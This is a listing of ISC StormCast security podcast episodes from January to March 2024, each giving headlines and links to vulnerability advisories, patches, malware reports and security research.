3/29/2024 (5 minutes, 36 seconds)

ISC StormCast for Thursday, March 28th, 2024

Scans for Apache OfBiz https://isc.sans.edu/diary/Scans%20for%20Apache%20OfBiz/30784
Wall-Escape (CVE-2024-28085) https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt
Recent "MFA Bombing" Attacks Targeting Apple Users https://krebsonsecurity.com/2024/03/recent-mfa-bombing-attacks-targeting-apple-users/
3/28/2024 (5 minutes, 20 seconds)

ISC StormCast for Wednesday, March 27th, 2024

New tool: linux-pkgs.sh https://isc.sans.edu/forums/diary/New%20tool%3A%20linux-pkgs.sh/30774/
Suspicious NuGet package grabs data from industrial systems https://www.reversinglabs.com/blog/suspicious-nuget-package-grabs-data-from-industrial-systems
Preventing Cross Service UDP Loops in QUIC https://bughunters.google.com/blog/5960150648750080/preventing-cross-service-udp-loops-in-quic
ShadowRay Attacks AI Workloads Actively Exploited in the Wild https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
TheMoon Malware Infects 6,000 ASUS Routers in 72 Hours for Proxy Service https://www.bleepingcomputer.com/news/security/themoon-malware-infects-6-000-asus-routers-in-72-hours-for-proxy-service/
3/27/2024 (5 minutes, 48 seconds)

ISC StormCast for Tuesday, March 26th, 2024

Tool updates: le-hex-to-ip.py and sigs.py https://isc.sans.edu/diary/Tool%20updates%3A%20le-hex-to-ip.py%20and%20sigs.py/30772
Apple Updates for MacOS, iOS/iPadOS, visionOS https://isc.sans.edu/diary/Apple%20Updates%20for%20MacOS%2C%20iOS%20iPadOS%20and%20visionOS/30778
Fake Python Infrastructure https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/
OpenVPN Update https://openvpn.net/community-downloads/
3/26/2024 (6 minutes, 2 seconds)

ISC StormCast for Monday, March 25th, 2024

1768.py's Experimental Mode https://isc.sans.edu/diary/1768.py%27s%20Experimental%20Mode/30770
CISPA Advisory on Application-Layer Loop DoS https://docs.google.com/document/d/1KByZzrdwQhrXGPPCf9tUzERZyRzg0xOpGbWoDURZxTI/edit
Fixes for Windows Server LSASS Memory Leak https://www.catalog.update.microsoft.com/Search.aspx?q=2024-03%20Cumulative%20Update
3/25/2024 (5 minutes, 31 seconds)

ISC StormCast for Friday, March 22nd, 2024

Geofeed https://isc.sans.edu/forums/diary/Whois%20%22geofeed%22%20Data/30766/
Apple Updates https://support.apple.com/en-us/HT201222
Apple Bug https://gofetch.fail/
GitHub Copilot AutoFix https://github.blog/2024-03-20-found-means-fixed-introducing-code-scanning-autofix-powered-by-github-copilot-and-codeql/
Fortinet PoC https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/
Ivanti Standalone Sentry https://forums.ivanti.com/s/article/KB-CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US
3/22/2024 (6 minutes, 24 seconds)

ISC StormCast for Thursday, March 21st, 2024

Scans for the Fortinet FortiOS CVE-2024-21762 Vulnerability https://isc.sans.edu/diary/Scans%20for%20Fortinet%20FortiOS%20and%20the%20CVE-2024-21762%20vulnerability/30762
Microsoft Reminder: It is Tax Season (at least in the US) https://www.theregister.com/2024/03/20/its_tax_season_and_scammers/
Abusing DHCP Administrators Group for Privilege Escalation in Windows Domains https://www.akamai.com/blog/security-research/abusing-dhcp-administrators-group-for-privilege-escalation-in-windows-domains
3/21/2024 (5 minutes, 56 seconds)

ISC StormCast for Wednesday, March 20th, 2024

Attacker Hunting Firewalls https://isc.sans.edu/diary/Attacker%20Hunting%20Firewalls/30758
Fortigate Vulnerability Exploit Available https://github.com/h4x0r-dz/CVE-2024-21762
IC3 Annual Report 2023 https://www.ic3.gov/Media/PDF/AnnualReport/2023_IC3Report.pdf
Issues with macOS 14.4 Update https://www.macrumors.com/2024/03/18/do-not-update-macos-sonoma-14-4/
3/20/2024 (5 minutes, 25 seconds)

ISC StormCast for Tuesday, March 19th, 2024

Microsoft announced deprecation of 1024-bit RSA Keys https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features#deprecated-features
Chrome Real-Time Safe Browsing Protection https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Fortra FileCatalyst Vulnerability CVE-2024-25153 https://www.fortra.com/security/advisory/fi-2024-002
Spring Security CVE-2024-22257 https://spring.io/security/cve-2024-22257/
TRENDnet TEW-827DRU Router Vulnerability CVE-2024-28353 CVE-2024-28354 https://warp-desk-89d.notion.site/TEW-827DRU-5c40fb20572148f0b00f329d69273791
3/19/2024 (5 minutes, 23 seconds)

ISC StormCast for Monday, March 18th, 2024

5GHoul Revisited: Three Months Later https://isc.sans.edu/diary/5Ghoul%20Revisited%3A%20Three%20Months%20Later/30746
Obfuscated Hexadecimal Payload https://isc.sans.edu/diary/Obfuscated%20Hexadecimal%20Payload/30750
ChatGPT Related OAuth Issues https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-data?utm_source=social&utm_medium=reddit
RedCanary Threat Detection Report https://redcanary.com/threat-detection-report/
CRL/OCSP Changes https://github.com/cabforum/servercert/blob/main/docs/BR.md
3/18/2024 (6 minutes, 39 seconds)

ISC StormCast for Friday, March 15th, 2024

Increase in the number of phishing messages pointing to IPFS and to R2 buckets https://isc.sans.edu/diary/Increase%20in%20the%20number%20of%20phishing%20messages%20pointing%20to%20IPFS%20and%20to%20R2%20buckets/30744
Fortinet New Vulnerabilities https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
Fortinet Updates https://www.helpnetsecurity.com/2024/03/14/cve-2023-48788-poc/
Arcserve UDP Vulnerability and PoC https://www.tenable.com/security/research/tra-2024-07
Michael Holcomb: Mode Matters: Monitoring PLCs for Detecting Potential ICS/OT Incidents https://www.sans.edu/cyber-research/mode-matters-monitoring-plcs-for-detecting-potential-ics-ot-incidents/
3/15/2024 (20 minutes, 37 seconds)

ISC StormCast for Thursday, March 14th, 2024

Using ChatGPT to Deobfuscate Malicious Scripts https://isc.sans.edu/diary/Using%20ChatGPT%20to%20Deobfuscate%20Malicious%20Scripts/30740
Critical Fortinet Vulnerabilities https://fortiguard.fortinet.com/psirt
Adobe Security Bulletins https://helpx.adobe.com/security/security-bulletin.html
Kubernetes Local Volumes Command Injection Vulnerability https://www.akamai.com/blog/security-research/kubernetes-local-volumes-command-injection-vulnerability-rce-system-privileges
3/14/2024 (5 minutes, 28 seconds)

ISC StormCast for Wednesday, March 13th, 2024

Microsoft Patch Tuesday March 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20March%202024/30736
Death Knell of NVD https://resilientcyber.substack.com/p/death-knell-of-the-nvd
Unrestricted file upload vulnerability in ManageEngine Desktop Central https://www.incibe.es/en/incibe-cert/notices/aviso/unrestricted-file-upload-vulnerability-manageengine-desktop-central
Siemens Fire Protection System Updates https://cert-portal.siemens.com/productcert/html/ssa-225840.html
3/13/2024 (5 minutes, 39 seconds)

ISC StormCast for Tuesday, March 12th, 2024

What happens when you accidentally leak your AWS API Keys https://isc.sans.edu/diary/What%20happens%20when%20you%20accidentally%20leak%20your%20AWS%20API%20keys%3F%20%5BGuest%20Diary%5D/30730
How Crypto Imposters are using Calendly to infect Macs with Malware https://cyberguy.com/news/how-crypto-imposters-are-using-calendly-to-infect-macs-with-malware/ https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/
Misconfiguration Manager: Overlooked and Overprivileged https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d
3/12/2024 (6 minutes, 17 seconds)

ISC StormCast for Monday, March 11th, 2024

Attack Wrangles Thousands of Web Users into a Password Cracking Botnet https://arstechnica.com/security/2024/03/attack-wrangles-thousands-of-web-users-into-a-password-cracking-botnet
Cisco VPN Client Vuln https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7
Fortinet Vulnerability Exploited https://bishopfox.com/blog/cve-2024-21762-vulnerability-scanner-for-fortigate-firewalls
pgAdmin Path Traversal https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/
Font Vulnerabilities https://www.canva.dev/blog/engineering/fonts-are-still-a-helvetica-of-a-problem/
QNAP Flaws https://securityonline.info/cve-2024-21899-cvss-9-8-critical-qnap-flaw-opens-door-to-hackers/
3/11/2024 (7 minutes, 17 seconds)

ISC StormCast for Friday, March 8th, 2024

AWS Deployment Risks - Configuration and Credential File Targeting https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20AWS%20Deployment%20Risks%20-%20Configuration%20and%20Credential%20File%20Targeting/30722
Apple Updates https://isc.sans.edu/diary/MacOS%20Patches%20%28and%20Safari%2C%20TVOS%2C%20VisionOS%2C%20WatchOS%29/30726
NSA/CISA Secure Cloud Guides https://media.defense.gov/2024/Mar/07/2003407866/-1/-1/0/CSI-CloudTop10-Identity-Access-Management.PDF https://media.defense.gov/2024/Mar/07/2003407858/-1/-1/0/CSI-CloudTop10-Key-Management.PDF https://media.defense.gov/2024/Mar/07/2003407859/-1/-1/0/CSI-CloudTop10-Managed-Service-Providers.PDF https://media.defense.gov/2024/Mar/07/2003407862/-1/-1/0/CSI-CloudTop10-Secure-Data.PDF https://media.defense.gov/2024/Mar/07/2003407861/-1/-1/0/CSI-CloudTop10-Network-Segmentation.PDF
3/8/2024 (5 minutes, 13 seconds)

ISC StormCast for Thursday, March 7th, 2024

Scanning and Abusing the QUIC Protocol https://isc.sans.edu/diary/Scanning%20and%20abusing%20the%20QUIC%20protocol/30720
Google Chrome Update https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html
Spinning YARN https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
Teamcity Exploited https://twitter.com/leak_ix/status/1765460190621581347
3/7/2024 (6 minutes, 6 seconds)

ISC StormCast for Wednesday, March 6th, 2024

iOS/iPadOS Updates with Zero Day Fixes https://isc.sans.edu/diary/Apple%20Releases%20iOS%20iPadOS%20Updates%20with%20Zero%20Day%20Fixes./30716
Why Your Firewall Will Kill You https://isc.sans.edu/diary/Why+Your+Firewall+Will+Kill+You/30714/
QEMU Tunnel https://securelist.com/network-tunneling-with-qemu/111803/
VMware Vulnerabilities Patched https://www.vmware.com/security/advisories/VMSA-2024-0006.html
3/6/2024 (6 minutes, 40 seconds)

ISC StormCast for Tuesday, March 5th, 2024

Capturing DShield Packets with a LAN Tap https://isc.sans.edu/diary/Capturing%20DShield%20Packets%20with%20a%20LAN%20Tap%20%5BGuest%20Diary%5D/30708
Additional Critical Security Issues Affecting Teamcity https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/
GitHub Push Protection Now On By Default https://github.blog/2024-02-29-keeping-secrets-out-of-public-repositories/
Android Updates https://source.android.com/docs/security/bulletin/2024-03-01
Linksys E-2000 Vulnerability https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8
3/5/2024 (5 minutes, 40 seconds)

ISC StormCast for Monday, March 4th, 2024

Scanning for Confluence CVE-2022-26134 https://isc.sans.edu/diary/Scanning%20for%20Confluence%20CVE-2022-26134/30704
Exploiting CSP Wildcards for Google Domains https://attackshipsonfi.re/p/exploiting-csp-wildcards-for-google
Silver SAML: Golden SAML in the Cloud https://www.semperis.com/blog/meet-silver-saml/
3/4/2024 (5 minutes, 28 seconds)

ISC StormCast for Friday, March 1st, 2024

Dissecting DarkGate: Modular Malware Delivery and Persistence as a Service https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Dissecting%20DarkGate%3A%20Modular%20Malware%20Delivery%20and%20Persistence%20as%20a%20Service./30700
Ivanti Incident Response Update https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b
GitHub Flooded with Infected Repos https://apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack
Security Flaws in No-Name Doorbell Cameras https://www.consumerreports.org/home-garden/home-security-cameras/video-doorbells-sold-by-major-retailers-have-security-flaws-a2579288796/
3/1/2024, 6 minutes, 27 seconds

ISC StormCast for Thursday, February 29th, 2024

Exploit Attempts for Unknown Password Reset Vulnerability https://isc.sans.edu/diary/Exploit%20Attempts%20for%20Unknown%20Password%20Reset%20Vulnerability/30698
StopRansomware: Updated ALPHV Blackcat Advisory https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a
GlobalBlock Service To Prevent Trademark Abuse https://www.bleepingcomputer.com/news/technology/registrars-can-now-block-all-domains-that-resemble-brand-names/
2/29/2024, 5 minutes, 37 seconds

ISC StormCast for Wednesday, February 28th, 2024

Take Downs and the Rest of Us: Do they matter? https://isc.sans.edu/diary/Take%20Downs%20and%20the%20Rest%20of%20Us%3A%20Do%20they%20matter%3F/30694
Joint Cybersecurity Advisory https://www.ic3.gov/Media/News/2024/240227.pdf
SVR Cyber Actors Adapt Tactics for Initial Cloud Access https://www.ncsc.gov.uk/news/svr-cyber-actors-adapt-tactics-for-initial-cloud-access
Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/
2/28/2024, 6 minutes, 13 seconds

ISC StormCast for Tuesday, February 27th, 2024

Utilizing the VirusTotal API to Query Files Uploaded to the DShield Honeypot https://isc.sans.edu/diary/Utilizing%20the%20VirusTotal%20API%20to%20Query%20Files%20Uploaded%20to%20DShield%20Honeypot%20%5BGuest%20Diary%5D/30688
New WiFi Authentication Vulnerabilities Discovered https://www.top10vpn.com/research/wifi-vulnerabilities/
Subdomain Takeover Spam https://labs.guard.io/subdomailing-thousands-of-hijacked-major-brand-subdomains-found-bombarding-users-with-millions-a5e5fb892935
2/27/2024, 6 minutes, 21 seconds

ISC StormCast for Monday, February 26th, 2024

Update: MGLNDD_* Scans https://isc.sans.edu/forums/diary/Update%3A%20MGLNDD_*%20Scans/30686/
Simple Anti-Sandbox Technique: Where's the Mouse? https://isc.sans.edu/diary/Simple%20Anti-Sandbox%20Technique%3A%20Where%27s%20The%20Mouse%3F/30684
Security Vulnerabilities in Apex Code Could Leak Salesforce Data https://www.varonis.com/blog/apex-code-vulnerabilities
IBM Operational Decision Manager Exploit CVE-2024-22319 CVE-2024-22320 https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
Linux Kernel TLS Vulnerability CVE-2024-26582 https://lore.kernel.org/linux-cve-announce/2024022139-spruce-prelude-c358@gregkh/
2/26/2024, 5 minutes, 48 seconds

ISC StormCast for Friday, February 23rd, 2024

Friend, Foe or Something In Between? https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Friend%2C%20foe%20or%20something%20in%20between%3F%20The%20grey%20area%20of%20%27security%20research%27/30670
Large AT&T Wireless Network Outage https://isc.sans.edu/diary/Large%20AT%26T%20Wireless%20Network%20Outage%20%23att%20%23outage/30680
ConnectWise ScreenConnect Used by LockBit https://www.bleepingcomputer.com/news/security/screenconnect-servers-hacked-in-lockbit-ransomware-attacks/
SSH-Snake Abused in the Wild https://github.com/MegaManSec/SSH-Snake
2/23/2024, 5 minutes, 51 seconds

ISC StormCast for Thursday, February 22nd, 2024

Phishing Pages Hosted on Archive.org https://isc.sans.edu/forums/diary/Phishing%20pages%20hosted%20on%20archive.org/30676/
ScreenConnect Authentication Bypass Exploit (CVE-2024-1709, CVE-2024-1708) https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
iMessage with PQ3 https://security.apple.com/blog/imessage-pq3/
2/22/2024, 6 minutes, 32 seconds

ISC StormCast for Wednesday, February 21st, 2024

Python InfoStealer With Dynamic Sandbox Detection https://isc.sans.edu/diary/Python%20InfoStealer%20With%20Dynamic%20Sandbox%20Detection/30668
ConnectWise ScreenConnect Vulnerabilities https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
Remove VMware Enhanced Authentication Plugin (EAP) CVE-2024-22245 CVE-2024-22250 https://kb.vmware.com/s/article/96442
Voltage Noise to Manipulate Wireless Chargers https://arxiv.org/pdf/2402.11423.pdf
2/21/2024, 6 minutes, 21 seconds

ISC StormCast for Wednesday, February 21st, 2024

Old Mirai, New Exploits https://isc.sans.edu/diary/Mirai-Mirai%20On%20The%20Wall...%20%5BGuest%20Diary%5D/30658
KeyTrap PoC Exploit https://github.com/knqyf263/CVE-2023-50387
Google Open Sources Magika File ID System https://opensource.googleblog.com/2024/02/magika-ai-powered-fast-and-efficient-file-type-identification.html
Exploiting Unsynchronised Clocks https://attackshipsonfi.re/p/exploiting-unsynchonised-clocks
2/21/2024, 5 minutes, 32 seconds

ISC StormCast for Tuesday, February 20th, 2024

Old Mirai, New Exploits https://isc.sans.edu/diary/Mirai-Mirai%20On%20The%20Wall...%20%5BGuest%20Diary%5D/30658
KeyTrap PoC Exploit https://github.com/knqyf263/CVE-2023-50387
Google Open Sources Magika File ID System https://opensource.googleblog.com/2024/02/magika-ai-powered-fast-and-efficient-file-type-identification.html
Exploiting Unsynchronised Clocks https://attackshipsonfi.re/p/exploiting-unsynchonised-clocks
2/20/2024, 5 minutes, 32 seconds

ISC StormCast for Monday, February 19th, 2024

SolarWinds Security Advisories https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-3_release_notes.htm
Google Chrome Adds Private Network Checks https://chromestatus.com/feature/4869685172764672
GoldFactory iOS Trojan https://www.group-ib.com/blog/goldfactory-ios-trojan/
2/19/2024, 7 minutes, 38 seconds

ISC StormCast for Friday, February 16th, 2024

USPS Anchors Snowballing Smishing Campaigns https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
Linux Issuing CVEs http://www.kroah.com/log/blog/2024/02/13/linux-is-a-cna/
Analyzing Pulse Secure Firmware and Bypassing Integrity Checking https://eclypsium.com/blog/flatlined-analyzing-pulse-secure-firmware-and-bypassing-integrity-checking/
Jennifer Walker: Detecting Rogue Ethernet Switches Using Layer 1 Techniques https://www.sans.edu/cyber-research/detecting-rogue-ethernet-switches-using-layer-1-techniques/
2/16/2024, 13 minutes, 11 seconds

ISC StormCast for Thursday, February 15th, 2024

Guest Diary: Learning by Doing: Iterative Adventures in Troubleshooting https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Learning%20by%20doing%3A%20Iterative%20adventures%20in%20troubleshooting/30648
Snap Trap: The Hidden Dangers within Ubuntu's Package Suggestion System https://www.aquasec.com/blog/snap-trap-the-hidden-dangers-within-ubuntus-package-suggestion-system/
The Risks of the MonikerLink Bug in Microsoft Outlook https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/
Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
AMD Patches https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7009.html
2/15/2024, 5 minutes, 44 seconds

ISC StormCast for Wednesday, February 14th, 2024

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20February%202024%20Patch%20Tuesday/30646
DNSSEC DoS Vulnerability CVE-2023-50387 https://www.presseportal.de/pm/173495/5713546
Zoom Desktop Client Vulnerability https://www.zoom.com/en/trust/security-bulletin
QNAP Vulnerability https://www.qnap.com/de-de/security-advisory/qsa-23-57 https://unit42.paloaltonetworks.com/qnap-qts-firmware-cve-2023-50358/
2/14/2024, 6 minutes, 24 seconds

ISC StormCast for Tuesday, February 13th, 2024

Exploit Against Unnamed "Bytevalue" Router Vulnerability Included in Mirai https://isc.sans.edu/diary/Exploit%20against%20Unnamed%20%22Bytevalue%22%20router%20vulnerability%20included%20in%20Mirai%20Bot/30642
Senior Executives Targeted in Ongoing Azure Account Takeover https://www.darkreading.com/cloud-security/senior-executives-targeted-ongoing-azure-account-takeover
CISA Partners With OpenSSF To Secure Software Repositories https://www.cisa.gov/news-events/alerts/2024/02/08/cisa-partners-openssf-securing-software-repositories-working-group-release-principles-package
PostgreSQL Vulnerability https://www.postgresql.org/support/security/CVE-2024-0985/
Microsoft Defender Bypass via Comma https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
2/13/2024, 5 minutes, 33 seconds

ISC StormCast for Monday, February 12th, 2024

MSIX With Heavily Obfuscated PowerShell Script https://isc.sans.edu/diary/MSIX%20With%20Heavily%20Obfuscated%20PowerShell%20Script/30636
Too Many Honeypots https://vulncheck.com/blog/too-many-honeypots
ClamAV Command Injection Vulnerability CVE-2024-20328 https://amitschendel.github.io/vulnerabilites/CVE-2024-20328/
ExpressVPN DNS Leaks https://www.expressvpn.com/blog/windows-app-dns-requests/
2/12/2024, 5 minutes, 50 seconds

ISC StormCast for Friday, February 9th, 2024

A Python MP3 Player With Builtin Keylogger Capability https://isc.sans.edu/diary/A%20Python%20MP3%20Player%20with%20Builtin%20Keylogger%20Capability/30632
Fake LastPass App in Apple App Store https://blog.lastpass.com/2024/02/warning-fraudulent-app-impersonating-lastpass-currently-available-in-apple-app-store/
Ivanti XXE Vulnerability https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure
FortiOS sslvpnd Vulnerability https://www.fortiguard.com/psirt/FG-IR-24-015
2/9/2024, 5 minutes, 46 seconds

ISC StormCast for Thursday, February 8th, 2024

Anybody knows what this URL is about? Maybe Balena API request? https://isc.sans.edu/forums/diary/Anybody%20knows%20that%20this%20URL%20is%20about%3F%20Maybe%20Balena%20API%20request%3F/30628/
Critical shim Vulnerability and Patch https://github.com/rhboot/shim/releases/tag/15.8
Volt Typhoon Lessons Learned https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques
2/8/2024, 5 minutes, 29 seconds

ISC StormCast for Wednesday, February 7th, 2024

Computer viruses are celebrating their 40th birthday (well, 54th, really) https://isc.sans.edu/diary/Computer%20viruses%20are%20celebrating%20their%2040th%20birthday%20%28well%2C%2054th%2C%20really%29/30624
Three million malware-infected smart toothbrushes used in Swiss DDoS attacks https://www.tomshardware.com/networking/three-million-malware-infected-smart-toothbrushes-used-in-swiss-ddos-attacks-botnet-causes-millions-of-euros-in-damages
Critical Security Issue Affecting TeamCity On-Premises CVE-2024-23917 https://blog.jetbrains.com/teamcity/2024/02/critical-security-issue-affecting-teamcity-on-premises-cve-2024-23917/
ResumeLooters https://www.group-ib.com/blog/resumelooters/
Facebook Advertising Spreads Novel Malware Variant https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/FaceBook_Ad_Spreads_Novel_Malware.pdf
2/7/2024, 6 minutes, 36 seconds

ISC StormCast for Tuesday, February 6th, 2024

Public Information and Email Spam https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620/
AnyDesk Update https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/ https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-213655-1032.pdf
Ivanti PoC For CVE-2024-21893 https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
Deepfake Exploits https://www.scmp.com/news/hong-kong/law-and-crime/article/3250851/everyone-looked-real-multinational-firms-hong-kong-office-loses-hk200-million-after-scammers-stage https://www.404media.co/inside-the-underground-site-where-ai-neural-networks-churns-out-fake-ids-onlyfake/
2/6/2024, 5 minutes, 54 seconds

ISC StormCast for Monday, February 5th, 2024

DShield Sensor Log Collection with Elasticsearch https://isc.sans.edu/forums/diary/DShield%20Sensor%20Log%20Collection%20with%20Elasticsearch/30616/
AnyDesk Breach https://anydesk.com/en/public-statement
Leaky Vessels https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/
2/5/2024, 5 minutes, 45 seconds

ISC StormCast for Friday, February 2nd, 2024

What is a "Top Level Domain"? https://isc.sans.edu/forums/diary/What%20is%20a%20%22Top%20Level%20Domain%22%3F/30612/
Updated CISA Ivanti Policy https://www.cisa.gov/news-events/directives/supplemental-direction-v1-ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure
Cloudflare Publishes Breach Details https://blog.cloudflare.com/thanksgiving-2023-security-incident
Vision Pro Update https://support.apple.com/en-us/HT214070
2/2/2024, 7 minutes, 3 seconds

ISC StormCast for Thursday, February 1st, 2024

The Fun and Dangers of Top Level Domains (TLDs) https://isc.sans.edu/diary/The%20Fun%20and%20Dangers%20of%20Top%20Level%20Domains%20%28TLDs%29/30608
Ivanti Releases Patches and New Vulnerabilities https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
glibc syslog() Vulnerability https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
ModSecurity WAF Bypass https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30
2/1/2024, 5 minutes, 53 seconds

ISC StormCast for Wednesday, January 31st, 2024

What did I say to make you stop talking to me? https://isc.sans.edu/diary/What%20did%20I%20say%20to%20make%20you%20stop%20talking%20to%20me%3F/30604
Identification of a top-level domain for private use https://itp.cdn.icann.org/en/files/root-system/identification-tld-private-use-24-01-2024-en.pdf
Juniper Patches https://supportportal.juniper.net/s/article/2024-01-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-have-been-addressed?language=en_US https://www.theregister.com/2024/01/30/juniper_networks_vulnerabilities/
ChatGPT Leaking Conversations Again https://arstechnica.com/security/2024/01/ars-reader-reports-chatgpt-is-sending-him-conversations-from-unrelated-ai-users/
1/31/2024, 6 minutes, 50 seconds

ISC StormCast for Tuesday, January 30th, 2024

Exploit Flare Up Against Older Atlassian Confluence Vulnerability https://isc.sans.edu/diary/Exploit%20Flare%20Up%20Against%20Older%20Altassian%20Confluence%20Vulnerability/30600
Malicious Python Packages Install Infostealer https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi
Linux ICMPv6 Router Advertisement RCE https://access.redhat.com/security/cve/cve-2023-6200
1/30/2024, 5 minutes, 41 seconds

ISC StormCast for Monday, January 29th, 2024

A Batch File With Multiple Payloads https://isc.sans.edu/diary/A%20Batch%20File%20With%20Multiple%20Payloads/30592
fritz.box domain used to advertise NFTs https://www.heise.de/news/Verwirrend-Internet-Domain-fritz-box-zeigt-NFT-Galerie-statt-Router-Verwaltung-9610149.html
Jenkins CVE-2024-23897 PoC https://github.com/gquere/pwn_jenkins/blob/master/README.md#jenkins-cli-arbitrary-read-cve-2024-23897-applies-to-versions-below-2442-and-lts-24263
Malicious Google Ads Target Chinese Users https://www.malwarebytes.com/blog/threat-intelligence/2024/01/malicious-ads-for-restricted-messaging-applications-target-chinese-users
1/29/2024, 7 minutes, 2 seconds

ISC StormCast for Friday, January 26th, 2024

Facebook AdsManager Targeted by a Python Infostealer https://isc.sans.edu/diary/Facebook%20AdsManager%20Targeted%20by%20a%20Python%20Infostealer/30590
Privacy Concerns about Apple Push Notifications https://twitter.com/mysk_co/status/1750502700112916504 https://www.youtube.com/watch?v=4ZPTjGG9t7s
Inside a Global Phone Spy Tool Monitoring Billions https://www.404media.co/inside-global-phone-spy-tool-patternz-nuviad-real-time-bidding/
1/26/2024, 6 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, January 25th, 2024

How Bad User Interfaces Make Security Tools Harmful https://isc.sans.edu/diary/How%20Bad%20User%20Interfaces%20Make%20Security%20Tools%20Harmful/30586
Sys:All Loophole Allowed Us to Penetrate GKE Clusters in Production https://orca.security/resources/blog/sys-all-google-kubernetes-engine-risk-example/
Automotive Pwn2Own https://www.zerodayinitiative.com/blog/2024/1/23/pwn2own-automotive-2024-the-full-schedule
Android Keystroke Injection Vulnerability Exploit https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
CVE-2024-0769 D-Link DIR-859 https://securityonline.info/cve-2024-0769-the-vulnerability-d-link-wont-fix-in-dir-859-router/
SANS.edu Dean's List https://www.sans.edu/students/awards
1/25/2024 (5 minutes, 29 seconds)

ISC StormCast for Wednesday, January 24th, 2024

Update on Atlassian Exploit Activity https://isc.sans.edu/forums/diary/Update%20on%20Atlassian%20Exploit%20Activity%20/30582/
PoC For Fortra GoAnywhere MFT Authentication Bypass CVE-2024-0204 https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/
Barracuda Web Application Firewall https://campus.barracuda.com/product/webapplicationfirewall/doc/102888530/security-advisory/
GitGot: GitHub leveraged by cybercriminals to store stolen data https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data
1/24/2024 (5 minutes, 42 seconds)

ISC StormCast for Tuesday, January 23rd, 2024

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple%20Updates%20Everything%20-%20New%200%20Day%20in%20WebKit/30578/
Atlassian Confluence RCE Vulnerability Exploits CVE-2023-22527 https://isc.sans.edu/forums/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576/
Updated Ivanti Mitigation Advice https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
Czech Republic Sets IPv4 Shutdown Date https://konecipv4.cz/en/
1/23/2024 (7 minutes, 17 seconds)

ISC StormCast for Monday, January 22nd, 2024

